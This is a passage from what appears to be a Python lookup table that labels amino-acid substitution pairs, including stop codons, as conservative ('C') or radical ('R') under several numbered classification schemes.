"G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"C",("G","Y"):"C",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"C",("I","Y"):"C",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"C",("L","Y"):"C",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"C",("M","Y"):"C",("M","V"):"C",("F","P"):"C",("F","S"):"C",("F","T"):"C",("F","W"):"C",("F","Y"):"C",("F","V"):"C",("P","S"):"C",("P","T"):"C",("P","W"):"C",("P","Y"):"C",("P","V"):"C",("S","T"):"C",("S","W"):"C",("S","Y"):"C",("S","V"):"C",("T","W"):"C",("T","Y"):"C",("T","V"):"C",("W","Y"):"C",("W","V"):"C",("Y","V"):"C",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"C",("Y","A"):"C",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"C",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"C",("Y","N"):"C",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"C",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"C",("Y","C"):"C",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"C",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"C",("Y","G"):"C",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"C",("Y","I"):"C",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"C",("Y","L"):"C",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"C",("Y","M"):"C",("V","M"):"C",("P","F"):"C",("S","F"):"C",("T","F"):"C",("W","F"):"C",("Y","F"):"C",("V","F"):"C",("S","P"):"C",("T","P"):"C",("W","P"):"C",("Y","P"):"C",("V","P"):"C",("T","S"):"C",("W","S"):"C",("Y","S"):"C",("V","S"):"C",("W","T"):"C",("Y","T"):"C",("V","T"):"C",("Y","W"):"C",("V","W"):"C",("V","Y"):"C",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},2:{("R","H"):"C",("R","K"):"C",("R","D"):"C",("R","E"):"C",("R","A"):"R",("R","N"):"C",("R","C"):"C",("R","Q"):"C",("R","G"):"C",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"C",("R","T"):"C",("R","W"):"R",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"C",("H","E"):"C",("H","A"):"R",("H","N"):"C",("H","C"):"C",("H","Q"):"C",("H","G"):"C",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"C",("H","T"):"C",("H","W"):"R",("H","Y"):"C",("H","V"):"R",("K","D"):"C",("K","E"):"C",("K","A"):"R",("K","N"):"C",("K","C"):"C",("K","Q"):"C",("K","G"):"C",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"C",("K","T"):"C",("K","W"):"R",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"C",("D","Q"):"C",("D","G"):"C",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"C",("D","T"):"C",("D","W"):"R",("D","Y"):"C",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"C",("E","Q"):"C",("E","G"):"C",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"C",("E","T"):"C",("E","W"):"R",("E","Y"):"C",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"C",("E","R"):"C",("A","R"):"R",("N","R"):"C",("C","R"):"C",("Q","R"):"C",("G","R"):"C",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"C",("T","R"):"C",("W","R"):"R",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"C",("E","H"):"C",("A","H"):"R",("N","H"):"C",("C","H"):"C",("Q","H"):"C",("G","H"):"C",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"C",("T","H"):"C",("W","H"):"R",("Y","H"):"C",("V","H"):"R",("D","K"):"C",("E","K"):"C",("A","K"):"R",("N","K"):"C",("C","K"):"C",("Q","K"):"C",("G","K"):"C",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"C",("T","K"):"C",("W","K"):"R",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"C",("Q","D"):"C",("G","D"):"C",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"C",("T","D"):"C",("W","D"):"R",("Y","D"):"C",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"C",("Q","E"):"C",("G","E"):"C",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"C",("T","E"):"C",("W","E"):"R",("Y","E"):"C",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},3:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"R",("D","Q"):"C",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"R",("E","Q"):"C",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"R",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"R",("N","T"):"R",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"R",("C","T"):"R",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"C",("F","T"):"C",("F","W"):"R",("F","Y"):"R",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"R",("Q","D"):"C",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"R",("Q","E"):"C",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"R",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"R",("T","N"):"R",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"R",("T","C"):"R",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"C",("T","F"):"C",("W","F"):"R",("Y","F"):"R",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},4:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"C",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"C",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"C",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"C",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"C",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"C",("H","Y"):"C",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"C",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"C",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"C",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"C",("N","Q"):"R",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"C",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"C",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"C",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"C",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"C",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"C",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"C",("Y","H"):"C",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"C",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"C",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"C",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"C",("Q","N"):"R",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"C",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},5:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A